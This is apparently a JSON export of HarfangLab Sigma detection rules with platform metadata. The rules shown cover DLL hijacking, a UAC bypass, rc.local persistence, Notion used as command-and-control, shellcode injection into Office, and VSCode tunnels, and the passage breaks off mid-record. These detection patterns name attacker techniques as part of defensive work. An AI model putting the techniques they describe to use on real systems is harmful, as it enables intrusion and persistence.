"content": "title: DLL Hijacking via ServiceHub.TestWindowStoreHost.exe\nid: 8093156c-fb61-4f53-a780-8596f8f72ffc\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio ServiceHub.TestWindowStoreHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ServiceHub.Host.CLR.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\TenioDL_core.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8093156c-fb61-4f53-a780-8596f8f72ffc",
"rule_name": "DLL Hijacking via ServiceHub.TestWindowStoreHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Visual Studio ServiceHub.TestWindowStoreHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80aad0df-28c0-4698-ac2c-9be3629de78e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073742Z",
"creation_date": "2026-03-23T11:45:34.073745Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073749Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_post_uac_bypass_iieaxiadmininstaller.yml",
"content": "title: UAC Bypass Executed via IIEAxiAdminInstaller\nid: 80aad0df-28c0-4698-ac2c-9be3629de78e\ndescription: |\n Detects an unsigned process being spawned by 'ieinstal.exe'.\n As all Internet Explorer extensions are supposed to be signed, if 'ieinstal.exe' spawns an unsigned process, it is most probably the consequence of a UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on the system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process spawned by 'ieinstal.exe' to look for malicious content and subsequent malicious child processes.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2020/10/19\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\ieinstal.exe'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_vcredist:\n # \"C:\\Users\\XXXX\\AppData\\Local\\Temp\\IDC2.tmp\\VCRedist.exe\"\n # old unsigned vcredist.exe...\n Image|endswith: '\\VCRedist.exe'\n\n exclusion_adobe:\n # C:\\Users\\XXXX\\AppData\\Local\\Temp\\IDC2.tmp\\AdobePlugin.exe\n Image|endswith: '\\AdobePlugin.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80aad0df-28c0-4698-ac2c-9be3629de78e",
"rule_name": "UAC Bypass Executed via IIEAxiAdminInstaller",
"rule_description": "Detects an unsigned process being spawned by 'ieinstal.exe'.\nAs all Internet Explorer extensions are supposed to be signed, if 'ieinstal.exe' spawns an unsigned process, it is most probably the consequence of a UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on the system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process spawned by 'ieinstal.exe' to look for malicious content and subsequent malicious child processes.\n",
"rule_creation_date": "2020-10-19",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80c6b401-983c-4576-bac5-ad2902f30c70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.683660Z",
"creation_date": "2026-03-23T11:45:35.297636Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297641Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon",
"https://attack.mitre.org/techniques/T1037/004/"
],
"name": "t1037_004_rc_local_modified_linux.yml",
"content": "title: RC Script rc.local Modified\nid: 80c6b401-983c-4576-bac5-ad2902f30c70\ndescription: |\n Detects an attempt to modify the RC script \"/etc/rc.local\".\n The \"/etc/rc.local\" file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to this file.\n It is recommended to download the RC script for analysis and to remove any potentially malicious binaries or shell commands.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon\n - https://attack.mitre.org/techniques/T1037/004/\ndate: 2022/12/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1037.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/rc.local'\n - '/etc/rc.d/rc.local'\n - TargetPath:\n - '/etc/rc.local'\n - '/etc/rc.d/rc.local'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: 
'/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns 
--mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80c6b401-983c-4576-bac5-ad2902f30c70",
"rule_name": "RC Script rc.local Modified",
"rule_description": "Detects an attempt to modify the RC script \"/etc/rc.local\".\nThe \"/etc/rc.local\" file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to this file.\nIt is recommended to download the RC script for analysis and to remove any potentially malicious binaries or shell commands.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1037.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80c7b1a3-29b3-4c45-8609-82e0738fb42c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603107Z",
"creation_date": "2026-03-23T11:45:34.603111Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603118Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf",
"https://www.notion.so",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_suspicious_url_to_notion.yml",
"content": "title: Suspicious URL request to api.notion.com\nid: 80c7b1a3-29b3-4c45-8609-82e0738fb42c\ndescription: |\n Detects suspicious URL requests to api.notion.com.\n Notion is a legitimate online workspace that can be abused by attackers as command and control (C2) infrastructure.\n The Nobelium GraphicalNeutrino malware is known to abuse this service for C2 communications.\n It is recommended to analyze the process responsible for the URL request to determine if the communication is legitimate.\nreferences:\n - https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf\n - https://www.notion.so\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/03/08\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1102.002\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'api.notion.com'\n\n filter_notion:\n ProcessSigned: 'true'\n ProcessSignature: 'Notion Labs, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80c7b1a3-29b3-4c45-8609-82e0738fb42c",
"rule_name": "Suspicious URL request to api.notion.com",
"rule_description": "Detects suspicious URL requests to api.notion.com.\nNotion is a legitimate online workspace that can be abused by attackers as command and control (C2) infrastructure.\nThe Nobelium GraphicalNeutrino malware is known to abuse this service for C2 communications.\nIt is recommended to analyze the process responsible for the URL request to determine if the communication is legitimate.\n",
"rule_creation_date": "2023-03-08",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80fbb6bd-afa2-4e53-952b-a18d5cf2772b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084774Z",
"creation_date": "2026-03-23T11:45:34.084776Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084780Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
"https://attack.mitre.org/techniques/T1106/",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1204_002_msoffice_injected_thread.yml",
"content": "title: Suspicious Thread Created in Office\nid: 80fbb6bd-afa2-4e53-952b-a18d5cf2772b\ndescription: |\n Detects the suspicious creation of an executable thread in a Microsoft Office application.\n A malicious VBA macro using the CALL function could directly leverage the Microsoft OS API to create an executable thread and inject a shellcode into it.\n It is recommended to investigate the document opened by Office when this detection happened to look for malicious VBA macros or the exploitation of vulnerabilities.\n It is also recommended to analyze the subsequent behavior of the Office application, mainly looking for suspicious child processes.\nreferences:\n - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n - https://attack.mitre.org/techniques/T1106/\n - https://attack.mitre.org/techniques/T1620/\ndate: 2023/12/14\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: injected_thread\ndetection:\n selection:\n ProcessImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n RegionSize|gte: 4096\n RegionSize|lte: 65536\n RegionState: 'MEM_COMMIT'\n RegionType: 'MEM_PRIVATE'\n RegionProtection: 'PAGE_EXECUTE_READWRITE'\n RegionAllocationProtection: 'PAGE_EXECUTE_READWRITE'\n\n filter_region_start_bytes:\n RegionDump|startswith:\n - '0x000000000000000000000000000000'\n - '0x4D5A'\n\n exclusion_mactray: # Injecter: MacType\\MacTray.exe, mt64agnt.exe, https://github.com/snowie2000/mactype\n ThreadDump|startswith: '0x40534883EC2033D2488BD9488B4910448D42'\n\n exclusion_gamemon: # Injecter: GameGuard\\GameMon64.des, https://gameguard.nprotect.com\n ThreadDump|startswith: '0xE831010000454C4908000005000A00000000'\n\n # Netskop EPDLP\n exclusion_netskop:\n ThreadDump|startswith: '0x4883EC284831C94831D249B8'\n RegionSize: 4096\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80fbb6bd-afa2-4e53-952b-a18d5cf2772b",
"rule_name": "Suspicious Thread Created in Office",
"rule_description": "Detects the suspicious creation of an executable thread in a Microsoft Office application.\nA malicious VBA macro using the CALL function could directly leverage the Microsoft OS API to create an executable thread and inject a shellcode into it.\nIt is recommended to investigate the document opened by Office when this detection happened to look for malicious VBA macros or the exploitation of vulnerabilities.\nIt is also recommended to analyze the subsequent behavior of the Office application, mainly looking for suspicious child processes.\n",
"rule_creation_date": "2023-12-14",
"rule_modified_date": "2025-09-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1204.002",
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "811137eb-c074-4346-95a0-c3b719d52436",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088075Z",
"creation_date": "2026-03-23T11:45:34.088077Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088081Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/",
"https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_linux_vs_code_tunnel_commandline.yml",
"content": "title: VSCode Proxy Tunnel Started via Command-line (Linux)\nid: 811137eb-c074-4346-95a0-c3b719d52436\ndescription: |\n Detects when the VSCode editor is launched with a command-line argument used to connect to a network tunnel.\n In July 2023, Microsoft added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\n This tunnel allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\n It is recommended to investigate the actions following the creation of this tunnel to determine if they are legitimate.\nreferences:\n - https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/09/25\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Exfiltration\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/code'\n - '/codium'\n CommandLine|contains: ' tunnel'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "811137eb-c074-4346-95a0-c3b719d52436",
"rule_name": "VSCode Proxy Tunnel Started via Command-line (Linux)",
"rule_description": "Detects when the VSCode editor is launched with a command-line argument used to connect to a network tunnel.\nIn July 2023, Microsoft added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\nThis tunnel allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\nIt is recommended to investigate the actions following the creation of this tunnel to determine if they are legitimate.\n",
"rule_creation_date": "2023-09-25",
"rule_modified_date": "2025-01-30",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8120633c-3a12-4a4a-ba28-aca664ee60b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627478Z",
"creation_date": "2026-03-23T11:45:34.627480Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627485Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_access_suspicious_calltrace_start.yml",
